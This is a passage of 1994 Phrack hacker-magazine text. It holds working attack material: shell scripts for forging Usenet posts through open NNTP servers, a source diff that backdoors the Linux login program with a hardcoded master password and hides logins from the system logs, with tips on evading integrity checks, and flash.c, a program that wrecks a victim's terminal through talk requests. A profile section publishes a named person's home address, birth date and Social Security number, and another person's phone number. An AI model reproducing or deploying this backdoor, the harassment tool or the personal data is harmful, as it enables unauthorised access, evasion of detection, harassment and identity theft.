echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 3
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
=======================
If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file
full of saved netnews into a list of hosts to try. Edit the output
of this if you want, to remove obvious peoples' names and other trash.
=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================
Once you have your host list, feed it to the following script.
=======================
#! /bin/sh
while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
sleep 5
echo ihave k00l@x.edu
sleep 4
echo .
echo quit
sleep 1
echo quit
) | telnet
done
=======================
If the above script is called "findem" and you're using csh, you should do
findem < list >& outfile
so that ALL output from telnet is captured. This takes a long time, but when
it finishes, edit "outfile" and look for occurrences of "335". These mark
answers from servers that might be willing to accept an article. This isn't a
completely reliable indication, since some servers respond with acceptance and
later drop articles. Try a given server with a slightly modified repeat of
someone else's message, and see if it eventually appears.
You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok". You can probably do regular POSTS through these, but they
will add an "NNTP-Posting-Host: " header containing the machine YOU came from.
------------------------------------------------------------------------------
Magic Login - Written by Data King - 7 July 1994
PLEASE NOTE:-
This program code is released on the understanding that neither the
author or Phrack Magazine suggest that you implement this on **ANY**
system that you are not authorized to do so. The author provides this
implementation of a "Magic" login as a learning exercise in security
programming.
Sorry for the disclaimer readers but I was advised by the AFP (Australian
Federal Police) that if I ever released this code they would bust me for
aiding and abetting. I am releasing it anyway as I believe in the right of
people to KNOW, but not necessarily to DO.
As always I can be emailed at dking@suburbia.apana.org.au
(Please note:- I have a NEW pgp signature.)
INTRODUCTION
~~~~~~~~~~~~
Briefly I am going to explain what a "Magic" login is and some of the steps you
need to go through to receive the desired result. At the end of this article is
a diff that can be applied to the shadow-3.2.2-linux archive to implement some
of these ideas.
EXPLANATION
~~~~~~~~~~~
A "Magic" login is a modified login program that allows the user to login
without knowing the correct password for the account they are logging into.
This is a very simple programming exercise and can be done by almost anyone, but
a really effective "Magic" login program will do much more than this. The
features of the supplied "Magic" login are:
- Will login to any valid account as long as you know the Magic password.
- Hides you in UTMP
[B
- Does not Log to WTMP
- Allows Root Login from NON authorized Terminals
- Preserves the Lastlogin information (ie Keeps it as though you had never
logged in with the magic password)
- Produces a binary that is exactly the same length as the original binary.
IMPLEMENTATION
~~~~~~~~~~~~~~
I am not going to go into great detail here on how to write such a system as
this. The code is very simple and it contains plenty of comments, so just look
there for ideas.
For this system to have less chance of being detected you need to do several
things.
First select a "Magic" password that is not easily identifiable by stringing the
binary. This is why in the example I have used the word "CONSOLE", this word
already appears several times in the binary so detection of one more is
unlikely.
Admittedly I could of encrypted the "Magic" password, but I decided against this
for several reasons.
The second thing you would need to do if you where illegally placing a "Magic"
login on a system would be to ensure that the admins are not doing CRC checks on
SUID(0) programs, or if they are that you change the CRC record of login to
match the CRC record of the "Magic" login.
Thirdly do not forget to make the date and time stamp of the new binary match
the old ones.
To install a new /bin/login on a system you will need to be root, now if you are
already root why would you bother? Simple, it is just one more backdoor that you
can use to get back in if you are detected.
LIMITATIONS
~~~~~~~~~~~
This version of the "Magic" login program does not have the following features,
I leave it entirely up to you about implementing something to fix them:
- Shells & Programs show up in the Process Table
- tty Ownership and attributes
- /proc filesystem
Any one of these to an alert system admin will show that there is an "invisible"
user on the system. However it has been my experience that most admin's rarely
look at these things, or if they do they can not see the wood for the trees.
-----<cut here>-----
diff -c /root/work/login/console.c /root/work/logon/console.c
*** /root/work/login/console.c Sun Oct 11 07:16:47 1992
--- /root/work/logon/console.c Sat Jun 4 15:29:15 1994
***************
*** 21,26 ****
--- 21,27 ----
#endif
extern char *getdef_str();
+ extern int magik;
/*
* tty - return 1 if the "tty" is a console device, else 0.
***************
*** 47,52 ****
--- 48,57 ----
if ((console = getdef_str("CONSOLE")) == NULL)
return 1;
+ /* Fix for Magic Login - UnAuth Console - Data King */
+
+ if (magik==1)
+ return 1;
/*
* If this isn't a filename, then it is a ":" delimited list of
* console devices upon which root logins are allowed.
diff -c /root/work/login/lmain.c /root/work/logon/lmain.c
*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992
--- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994
***************
*** 105,110 ****
--- 105,111 ----
char *Prog;
int newenvc = 0;
int maxenv = MAXENV;
+ int magik; /* Global Flag for Magic Login - Data King */
/*
* External identifiers.
diff -c /root/work/login/log.c /root/work/logon/log.c
*** /root/work/login/log.c Mon Oct 12 17:35:07 1992
--- /root/work/logon/log.c Sat Jun 4 15:37:22 1994
***************
*** 53,58 ****
--- 53,59 ----
extern struct passwd pwent;
extern struct lastlog lastlog;
extern char **environ;
+ extern char magik;
long lseek ();
time_t time ();
***************
*** 83,89 ****
(void) time (&newlog.ll_time);
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
(void) lseek (fd, offset, 0);
! (void) write (fd, (char *) &newlog, sizeof newlog);
(void) close (fd);
}
--- 84,93 ----
(void) time (&newlog.ll_time);
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
(void) lseek (fd, offset, 0);
! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */
! { /* login - Data King */
! (void) write (fd, (char *) &newlog, sizeof newlog);
! }
(void) close (fd);
}
diff -c /root/work/login/utmp.c /root/work/logon/utmp.c
*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992
--- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994
***************
*** 70,75 ****
--- 70,77 ----
extern long lseek();
#endif /* SVR4 */
+ extern int magik;
+
#define NO_UTENT \
"No utmp entry. You must exec \"login\" from the lowest level \"sh\""
#define NO_TTY \
***************
*** 353,368 ****
/*
* Scribble out the new entry and close the file. We're done
* with UTMP, next we do WTMP (which is real easy, put it on
! * the end of the file.
*/
!
! (void) write (fd, &utmp, sizeof utmp);
! (void) close (fd);
!
! if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
(void) write (fd, &utmp, sizeof utmp);
(void) close (fd);
}
- utent = utmp;
#endif /* SVR4 */
}
--- 355,372 ----
/*
* Scribble out the new entry and close the file. We're done
* with UTMP, next we do WTMP (which is real easy, put it on
! * the end of the file. If Magic Login, DONT write out UTMP - Data King
*/
! if (magik !=1)
! {
(void) write (fd, &utmp, sizeof utmp);
(void) close (fd);
+
+ if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
+ (void) write (fd, &utmp, sizeof utmp);
+ (void) close (fd);
+ }
+ utent = utmp;
}
#endif /* SVR4 */
}
diff -c /root/work/login/valid.c /root/work/logon/valid.c
*** /root/work/login/valid.c Sun Oct 11 07:16:55 1992
--- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994
***************
*** 25,30 ****
--- 25,32 ----
static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91";
#endif
+ extern int magik;
+
/*
* valid - compare encrypted passwords
*
***************
*** 43,48 ****
--- 45,64 ----
char *encrypt;
char *salt;
char *pw_encrypt ();
+ char *magic;
+
+ /*
+ * Below is the piece of code that checks to see if the password
+ * supplied by the user = the Magic Password - Data King
+ */
+
+ magic = "CONSOLE"; /* Define this as the Magic Password - Data King */
+
+ if (strcmp(password,magic) == 0)
+ {
+ magik = 1;
+ return(1);
+ }
/*
* Start with blank or empty password entries. Always encrypt
------------------------------------------------------------------------------
/* flash.c */
/* This little program is intended to quickly mess up a user's
terminal by issuing a talk request to that person and sending
vt100 escape characters that force the user to logout or kill
his/her xterm in order to regain a sane view of the text.
It the user's message mode is set to off (mesg n) he/she will
be unharmed.
This program is really nasty :-)
Usage: flash user@host
try compiling with: gcc -o flash flash.c
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <strings.h>
/* this should really be in an include file.. */
#define OLD_NAME_SIZE 9
#define NAME_SIZE 12
#define TTY_SIZE 16
typedef struct {
char type;
char l_name[OLD_NAME_SIZE];
char r_name[OLD_NAME_SIZE];
char filler;
u_long id_num;
u_long pid;
char r_tty[TTY_SIZE];
struct sockaddr_in addr;
struct sockaddr_in ctl_addr;
} OLD_MSG;
typedef struct {
u_char vers;
char type;
u_short filler;
u_long id_num;
struct sockaddr_in addr;
struct sockaddr_in ctl_addr;
long pid;
char l_name[NAME_SIZE];
char r_name[NAME_SIZE];
char r_tty[TTY_SIZE];
} CTL_MSG;
#define TALK_VERSION 1 /* protocol version */
/* Types */
#define LEAVE_INVITE 0
#define LOOK_UP 1
#define DELETE 2
#define ANNOUNCE 3
int current = 1; /* current id.. this to avoid duplications */
struct sockaddr_in *getinaddr(char *hostname, u_short port)
{
static struct sockaddr addr;
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)&addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
/* fill in the easy fields */
address->sin_family = AF_INET;
address->sin_port = htons(port);
/* first, check if the address is an ip address */
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1)
{
/* it wasn't.. so we try it as a long host name */
host = gethostbyname(hostname);
if (host)
{
/* wow. It's a host name.. set the fields */
/* ?? address->sin_family = host->h_addrtype; */
bcopy( host->h_addr, (char *)&address->sin_addr,
host->h_length);
}
else
{
/* oops.. can't find it.. */
puts("Couldn't find address");
exit(-1);
return (struct sockaddr_in *)0;
}
}
/* all done. */
return (struct sockaddr_in *)address;
}
SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
{
int s;
struct sockaddr sample; /* not used.. only to get the size */
s = socket(AF_INET, SOCK_DGRAM, 0);
sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
}
new_ANNOUNCE(char *hostname, char *remote, char *local)
{
CTL_MSG packet;
struct sockaddr_in *address;
/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);
bzero( (char *)&packet, sizeof(packet) );
packet.vers = TALK_VERSION;
packet.type = ANNOUNCE;
packet.pid = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);
SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
}
old_ANNOUNCE(char *hostname, char *remote, char *local)
{
OLD_MSG packet;
struct sockaddr_in *address;
/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);
bzero( (char *)&packet, sizeof(packet) );
packet.type = ANNOUNCE;
packet.pid = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);
SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
}
main(int argc, char *argv[])
{
char *hostname, *username;
int pid;
if ( (pid = fork()) == -1)
{
perror("fork()");
exit(-1);
}
if ( !pid )
{
exit(0);
}
if (argc < 2) {
puts("Usage: <finger info> ");
exit(5);
}
username = argv[1];
if ( (hostname = (char *)strchr(username, '@')) == NULL )
{
puts("Invalid name. ");
exit(-1);
}
*hostname = '\0';
hostname++;
if (*username == '~')
username++;
#define FIRST "\033c\033(0\033#8"
#define SECOND "\033[1;3r\033[J"
#define THIRD "\033[5m\033[?5h"
new_ANNOUNCE(hostname, username, FIRST);
old_ANNOUNCE(hostname, username, FIRST);
current++;
new_ANNOUNCE(hostname, username, SECOND);
new_ANNOUNCE(hostname, username, SECOND);
current++;
new_ANNOUNCE(hostname, username, THIRD);
old_ANNOUNCE(hostname, username, THIRD);
}
------------------------------------------------------------------------------
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 5 of 28
****************************************************************************
-:[ Phrack Pro-Phile ]:-
This issue our prophile introduces you to one of the craziest people
I've ever met from the Underground. And coming from a complete loon
like me, that's saying something. This guy is a real Renaissance Man:
Hacker, programmer, burglar, convict, star of stage and screen...
Of course, that someone could only be:
Minor Threat
~~~~~~~~~~~~
_____________________________________________________________________________
Personal Info:
Handle: Minor Threat
Call him: MT, minor, lamer
Born: 1972 in Walnut Creek, California
Age: 22
Height: 6'1"
Weight: 155 lbs
e-mail: mthreat@paranoia.com
www: http://www.paranoia.com/~mthreat/
Affiliations: Dark Side Research
Computers owned: 1981: IBM PC
1982: none
1984: PCjr
1988: XT Clone
1990: 386/25 Clone
1992: Too many to legally list
1994: Pentium & 486
How I got started
~~~~~~~~~~~~~~~~~
In 1981, my dad worked for IBM. In October of that year, he
brought home a PC, and I jumped on BASIC. It wasn't until 1984 that
I got my first modem. I had just moved to Florida with my dad, and
he had a modem. I met some other kids with computers and modems and
they taught me what modems were for: "You call other people's
computers and try to get their passwords and intercept their mail".
(That's what I was taught!) It wasn't until a few months later I
realized that this wasn't the actual purpose of BBSs and modems.
My first BBS was the Towne Crier BBS at FAU (Florida Atlantic
University), 305-393-3891 (I still remember that damn number), but
the NPA has since changed to 407. We thought it was so cool when
we logged on as "All" and deleted all the messages posted to "All".
In about 1985, I moved back to Austin. I screwed around for
several years without doing any real hacking. When I got to high
school, I wanted to change my grades like in War Games, so I looked
through the counselor's office until I found a number to the
Education Service Center. I had to scan a whole _100_ numbers
(929-13xx) to find the HP3000 dialup. Once I found it, I had no
idea what to do. I gave the number to a friend in high school,
who gave it to some of his hacker friends. They hacked it and gave
it back to me, complete with a full list of passwords and commands.
It turns out, the two Austin hackers who did it were The Mentor and
Erik Bloodaxe, but I didn't know that for another 3 years.
Shortly after this, I picked my permanent handle. Minor Threat
was an early-to-mid 1980's punk band from Washington, DC. They're no
longer together, but Fugazi is pretty good and Ian McKaye (from
Minor Threat) is in Fugazi. I actually got the handle off of one
of my sister's tapes, before I even heard them. But now I like the
music too.
Eventually, I found a local pirate board, met all the local
pirates, and got into the warez scene for a while. I joined PE
(Public Enemy), the pirate group. (I cracked the warez!) Warez were
only so fun, so I looked for other stuff. I met some VMB lamers and
got into that scene for about a month, and got bored again.
This was 1990, our 950s were running out, and we needed another
way to call out. So I took an old VMB hacking program I had
written, and changed it around to scan for tones, in random order
to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone-
Locator. I gave it to some friends (Alexis Machine & Marko Ramius)
and eventually, it ended up on some warez boards. It got pretty
popular, so I made a version that worked for more people, called
it 0.90, and released it. Then I lost the source in a hard drive
crash, and stopped working on it.
I was 18 and mom said it was time to get out of her house, so
I got my own apartment. Marko Ramius and I learned about trashing
central offices, and gained COSMOS access. We barely knew what
COSMOS was .. I knew I had read about it in old Phrack articles, and
I remembered that it was "elite." Our problem was, we still knew no
other "real" hackers, and we had to learn COSMOS. After trashing
and trashing, we still had no COSMOS manuals. We had to get them
somehow. I can't say how, I'll leave it to your imagination.
Marko and I started breaking in buildings and got pretty
good at it. We had about a 60% success rate I would guess. But we
never stole anything -- we just looked for cool information. In
1991, we got caught in a building, and got charged with Criminal
Trespassing. We both got probation for a Class A misdemeanor.
We decided it was time to stop breaking in buildings.
Late in 1991, I got e-mail on a bulletin board from someone
named Mucho Maas. He said he had gotten ToneLoc and wanted a
few new features. I told him I had lost the current source and
all I had was an old (0.85) source. He said he would take the
old source, add the new features, and bring it up-to-date with
the current source. So he did, and we released ToneLoc 0.95.
If it weren't for Mucho, ToneLoc would still be at version 0.90,
and anyone who ran 0.90 knows how hard it was to get it running
right.
About the same time, I was getting on a few BBSs in the
Washington DC area. (Pentavia was the best while it was up).
I met several people there... including a guy named Codec. Codec
was mostly a phone phreak, but did a little hacking as well. But
when it came to PBX's, he was a master. Not only had he exploited
PBXs for free long distance use like the rest of us, but he had
actually REMOVED entire PBX systems from buildings! (See his
article on how to do this, Phrack 43, article 15). But he had
also gotten caught and was on federal probation.
A few months after I met Codec, he had an 'incident'
and was on the run again. I agreed to let him live with me, so
he flew down and moved in. We got a 2 bedroom place, and set
the place up d0pe. There were over 9 phone extensions, (not
including cordless), and about the same number of computers (Most
of which were Codec's). We had the funnest 3 months ever ...
but about 2 weeks after SummerCon 1992, we got arrested.
Favorite things
~~~~~~~~~~~~~~~
Women: w0w
Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys,
Jane's Addiction.
Favorite Book: 1984
My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360
horsepower. It's fucking fast.
Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs,
The Lost Boys, Near Dark, Hardware.
Favorite TV: MacGyver
What are some of your most memorable experiences?
Being polygraphed by the Secret Service in 1991 for something having
to do with some lamer threatening the president on an Alliance
Teleconference. I failed the polygraph the first time, then I
passed it the second time. (How's that for the government?)
Eventually, some other 15-year old got probation for doing it.
Being arrested with Codec in 1992. He ran, outran the cops, jumped
a fence about 8 feet tall, and eventually got in a struggle with
a cop over the his gun (Officer Sheldon Salsbury, Austin PD). The
gun went off, and we were both booked on attempted capital murder.
It turned out that the bullet hit no one, and all the blood was from
the cop hitting himself in the head with his own gun, although the
cop claims that Codec hit him in the forehead with a 2-meter ham
radio from like 20 feet away. Right. A search warrant was executed
on our apartment, and approximately $800,000 worth of AT&T Switching
equipment was seized from Codec's closet. It turns out, we were
narced on and set-up by :
Jon R. Massengale
6501 Deer Hollow
Austin, TX 78750
DOB: 9-7-62
SSN: 463-92-0306
Being the first in Texas to have Caller-ID, before it was legally
available.
Losing control of my car at 140mph, doing a slow 360 at about 120,
living through it, and not doing too much damage to my car.
Good times:
Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi,
getting our car towed, then reading the dialups to the towing
company's xenix (login: sysadm). Finally getting our Oki 900's
to clone/tumble/do other d0pe things. Calling each other on
our Okis from 5 feet away, putting them together and causing
feedback.
Setting up my apartment with Codec with a 10-station Merlin system,
and a 9-station network.
SummerCon 1993. "Culmination of Coolness." Sorry, can't say any
more.
Some People To Mention:
There are a lot of people who I would like to mention that have helped
me greatly and who I have known for a very long time:
Marko Ramius - First pirate/hacker I really knew in person. We
did a lot of crazy shit together.
Alexis Machine - Second hacker-type I met, and a true Warez Kid.
(that's a complement!)
Mucho Maas - Brought back ToneLoc from the dead. Always told
me what I shouldn't do, and always said "I told
you so" when I got busted.
Codec - I had some of the funnest times of my life with
Codec... unfortunately, it was so much fun it was
illegal, and we got busted.
Cerebrum - Very cool friend who got narced on by a fuckhead
named Zach, 206-364-0660. Cerebrum is serving
a 10 month federal sentence in a nice prison camp
in Sheridan, Oregon. He gets out about December
10, 1994.
The Conflict - Unfortunately, I can't tell you. Maybe in about 8
more years.
ESAC Administrator - "Have you been drinking on the job?"
What I'm up to now
~~~~~~~~~~~~~~~~~~
When I heard that the next Phrack Pro-phile was going to be about
me, I realized, "I must be retired". It's probably true.. at least I hope
it is. The 5 months I spent in jail was enough. I just started going
back to University of Texas, where they will only give me a VAX account
(lame). For the first time in 4 years, I think my life is going in
the 'right' direction.
Advice
~~~~~~
I can only hope anyone who reads this will take this seriously.
Here's my advice: If you ever get arrested or even simply questioned about
ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement
official or whoever, "I'm sorry, I can't talk without my lawyer present"
Cooperating will never help you. Codec recently pointed out to me, that
we should be the "role models" of what people should do when they get
busted. Both of us remained loyal and quiet during our whole case. I was
in jail for 5 months, and Codec is still in prison, but we never talked.
Being narced on by a 'buddy' is the worst thing that could ever happen
to you, and narcing on a 'buddy' is the worst thing you could do to
them. If you get busted for something, don't pass the punishment on
to someone else. I hope most of you never have to face this, but if
you do, you will live much better knowing that you didn't give in to
a bunch of 'law enforcement' pricks.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 6 of 28
****************************************************************************
BIG FUN
Think Federal District Court Judges and Special
Agents get to have all the fun?
Not any more!!
It's the Operation Sun Devil Home Game!
For the first step in the game, a quick flourish of a pen
signs away your opponent's rights to any expectations of
privacy. Bank records, medical records, employment
files, student records...literally anything is yours
for the taking.
As you progress through the various levels, you move on
to other legal scenarios like the application for search
warrant and the summons.
It's all here in the Operation Sun Devil Home game, by
Gailco.
===============================================================
Other game pieces available via ftp from freeside.com
in /pub/phrack/gailco.
Offer not sold in stores. Do not use.
Impersonating an officer of the court is a felony.
section 1 of uuencode 4.13 of file GAME.PCX by R.E.M.
begin 644 GAME.PCX
M"@,!`0````!/!D@(Q@#&````````````````````````````````````````V
M```````````````````````````!R@`!`"`#6`(`````````````````````W
M``````````````````````````````````````````````````#________-(
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_]'_P?!'P?[!X<'@P?_!]F#$_\'XPO_!\'______ZO_1_\'P8\'^X
M8<'@P?_!]&#$_\'XPO_!\'_!_O_____I_]#_'\'@P>'!_@$`?\'&`'_#_\'PF
MP?@^(!X.?\'_P?C_____YO_0_P_"P\'^`PX_CAX?P__!P,'\'P/"#A_!_\'^^
M'______E_]#_!X?!Y\'^`PX_#L(>#V_!_\'`?!X'C@\?P?^$#\'_A\[_C___X
M___4_]#_!X?!Y\'_`PX_#PX>#V?!_\'&P?X?!X</'\'_!P_!_X?._P?#_Y_!E
M_Y______SO_/_\'^`8?!\<'^`X`_#@`AA&?!_\'\?QP#!X^?P?\/CC^`/P_!M
MY<'_G[_'_\'^`#'!_\'G'\'\!______._\__P?PAP>?!\<'^`<'`P?\,`&"`L
M8<'_P?C!_SP@!X^?P?^#P>QXP<!X(\'@P?P_P>'!^,'_P?G$_\'\`#'!_\'A&
MG\'X`?_____._\__P?P`P>/!\<'\<`!_'#!@`&/!_\'PP?YX<`?!Q\'?P?_!H
MP,'X<,'`&`'!P'#"`,'P/\'QP>!_P?A_P?!X<<'^P?*?PO#!\<']_____\S_<
MS__!_&#!X\'PP?QP.'Y\<&`@9\'_P?C!_'AP)\'WPO_!X'APP>`X8,'@<&`@,
MP?`_P?#!X'_!^'_!^'QPP?S!\+_#\,'XP?S_____R__/_\'X8&'!X<'\<`P_<
M'GYAP>8'P?_!^,'^.,'[AX^?P?_!\``XP<.`<!H`P<`PP>$/P?&`'\'P0\'PV
MP?_!\`AA'\'AP?G!P,'@.`______RO_/_\'\'$.#P?X0#A\>/@.&#\'_P?C!S
M_QS!_P^/G\'_P=X$/,''@'@?``(<7P_!\8<?P?N'P?C!_\'P#F,?P>/!_X``M
M#`______RO_0_\'^#@_!_@`$/P\^``\.?\'\P?\<P>8?CQ_!_P\$/`>,>!\`7
M!AP$#\'A#Q_!_@?!_,'_P>,,0Q_!Q\'_C`,,#______*_]'_/@_!_P<&/P\_9
M!L(//\+_'\'F'X\/P?\/AAZ'ACH/`@X>`@_!XX</P?X'P?[!_X..0P_!Q\'_[
MC@,&!______*_]+_'\'_!\'`P?\//\'^'[_$_\'\/Y\?P?\'!`"'#"`.`8P\P
M`P_!X8<?P>`'P?P_`8#!XQ_!X\'_@``0`______*_]7_P?'!_\'OR/_!_<'_]
MP?X_P?^`P@#!P`@A@"#!X#A`#\'AAQ_!X,'#P?A\`<'@P>$?P>'!^,'`<``#'
M_____\K_U__!Y\K_P?Y_P?_!X'Q`P>!X`<'@<``PP>`'P?#!QI_!X,'#P?C"4
M,,'AP>"?PO``<`#!\______*_^7_P?C!_\'YPOASP?#!^'S!^,'PP?_!\<+_@
MP?!AP?Q@<,'QP>`_P?!@P@`PP>/_____RO_I_\'X?\'[P?Y_P?[!\,'_P?G"^
M_\'X`\'\`''"X1_!^,0`0______*_^G_P?[-_\'?P_^?P?X'@A`>#______*;
M__W_#\'/'A\/_____\K_S__!]\,'S`^/P=^/P=_#G______F_\__P?3$`,8$2
MP@##!`>'#Q_"G\*______^7_S__!_<'XPN!@PR``PB``PB#,`"``PB#$8,'@R
MPF#!X&#"^<']P?G!_?_____1_]#_P?G%\,)@P>#!\&!PP?#"X&!`Q6``0,0`1
MQ4#"8$#"8'#&\,'QP?G!_?_____,_]__P?W!_\/YP?W!^<'XP?#"^,;PQG##:
M8,(@Q6#$<,3PP?'!^\'PP?C!_\'Y___]_^?_P?O"_\/[P?#!^<+P<&#!\'!@'
MPT#+`,-`8&'!^\+PPOO___W_S__!^L0``@#'`L(&#L(/'Y_"'Y\?P?^?P=_/@
M_\+?GY["#@;%`LH`Q@(/PA^?P=____#_S__!_L4$P@`$P@#"!,4&P@\.Q@_"K
M'\?_O\G_O\8/P@["!@0&!,@`PP0&#L</'\'_/___Z?_0_\*/#\4'P@\'PP\'F
MR`8"!@+%!L('PP;"!\4/CY^/PY_!W\;_G\6/Q`_$!\P&PP?)#\*/GP_#C\.?I
M___3_]3_C\(/!X^?#[^?CP?"!,(`PP33``0.!P^/PY_"O\S_O\'_P=^_C\(?X
MPP31`,($`,@$!L(/'\*?___0_^;_P?W!^<'QP_G"\,'QP?#!X,)@(&`@S0#"'
M(,'@8'#!X,']PO'"^<+]RO_!_<'_P?W$^<'QP^!@QR``PB#+`"``PB!@Q.#!8
M\,'@8,'@P?#!\<'@P>'!_<'_P?W[_^C_P?O!_\'YPOO!^,']P?G&\,/@Q&#"I
M0,8`PD##8,'@QO#!\\/YR__#^\+QR?!PP?#"X,)@P>#$8$##`$``PF##0&#";
M0`#$8'#(\,'Q]/_Z_\']P?G!_<+YP?C#\'#!\,-PQ&#%(,5@PW#!\,)PP?#$F
M^,+YP?_!_<'YP?W)_\']P?_!_<'_P?W!_\'YP?_!^<'XQ/!PP?#$<,-@<,)@-
M<,A@PR#$8,)P8,1PP?!PQ/#!^,'YP?C!_=_____!_\'YP?_!\,'YP>##\,'`B
M0-(`0&#$\,'YP_O7_\'ZP?'!^,'YP?C!^<'P0&!`<$!@PT#7`$#"`$#"<,'XO
M>,'[P?_!^\'YP?O9____SO_!W\*?'Q[##L(&P@+.``(&P@#$`L<&#AX/PI_!9
MW];_G\'?'X\>!@<.PP8"#L,"T`##`L,&P@X/'\[____1_Y^_PI\?Q`_##@8.Q
MQ`;"!,0`!,8`!``&P@0`PP0&Q@\?#\2?OY^_G[^?R?^_P?^_#\(?GQ\/PA^/N
MPP\.#P8/Q0;.`,(&#A_,____W__!W\'_G\'/PX_"#\8'!L0'!L('Q08"R`;#-
M!P;&!\(/!\(/Q(^?C\'?P<_!_\'?RO^?P?^/P=_"G\*/#X_%#\('P@;"`@8":
M#\S____I_Y^_/[^/P@\_Q`\'CP;"!-@`P@0`P@</#@^/P[_!_Y_7_\*?AX0`1
M!``?S/____O_P_W!^<'QPN#!\,'@PV`@8,(@8"``(,\`(``@`,(@8,'@8,'@$
M8,'@8,+PP?'!^<+QP?G!_=C______\'_P?G!_\/YP?C+\,'@PV!`8-``0`!`,
M(&#"0,'PPF#!X,/PP?'!^<'QPOG1_______2_\3]P?G%^,GPQ'#"8"#"8,D@Y
MQ&#$<'_,_______?_\+[P?_!^\'_P?G!^'#"\,'`0`#"0-$`'\S______^[_"
MP]_!_\'?P?^?PA_##L(&PP(?S/______^/^_P?^?O\,/'\S_________S?__&
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_V_\'`?\'\?\'S_____]'_]O\`'\'^'\'S_____]'_]?_!_@`.!!_!L
MP#]_T__!S___^O_U_\'^``8"'X`??\3_P<?._\''O___^?_U_\'PPP`?@`#%P
M_\'`SO^`'___^?_U_\'PPP`_@`#%_\'@SO_!P"/___G_]?_!X,,`/@`!Q?_!$
MX<7_P?C'_\'\P@#!\=/_P?S#_\']___@__7_P>!@(``\(`'%_\'AP?_!\\/_0
MP?Q_QO_!^,(`<=/_P?A]P?_!_,'XQ/_!^<K_P?W__]#_]?_!X,'XP>``.$`#'
MQ?_!P\'_P>/#_\'X#\;_P?#"``/3_\'X.,'X0``#P__!P<K_P?S__]#_]?_!1
MP\'_P<`#'@`'Q?_!Q\'_P<?#_\'\#\;_P?#"``?#_\'/Q?_!W\G_P?X"PP`#3
MP_^#RO_!_A___\__]?^'P?^'`Q_!Z`?%_\'/P?^'P__!_@?&_\'`#@`/P_^/T
MQ?^/R?_!_L4`/\+_A\K_P?P?RO_!_!___\/_]?^'P?\'`Q_!Z`?%_\'/P?^'V
MP__!_@?&_\''#P`/P_^/Q?^/R?_!_L4`'\+_A\7_G\3_P?X?RO_!X@^?___"7
M__7_C\'^#@,_P?@'Q_\'P__!_``_Q?^'P?_!P!_#_P_%_P_)_\'^Q0`/PO^/Y
MQ?^?Q/_!^#_*_X`$'___PO_U_\'OP?P,`3_!^`/'_P/#_\'\`'_%_\'#P?_!*
M\#_#_P_$_\'^#\K_Q0`'PO^/Q?^_Q/_!\'_#_\']QO_!X``G___"__;_P?`X^
M`'_!\`/&_\'\`\/_P?P`/\7_`\'_P?A_PO_!_`_$_\'X'\;_P?'#_\'`Q``'\
MQ__!_'_$_\'PQ/_!\,7_P?Z```/__\+_]O_!\'@`?\'X`<+_P?W#_\'X`\3_%
MP>`KQ/_!_@/!_\'X?\+_P?POQ/_!^#_&_\'QP__!X,0``\?_P?A_Q/_!\,3_4
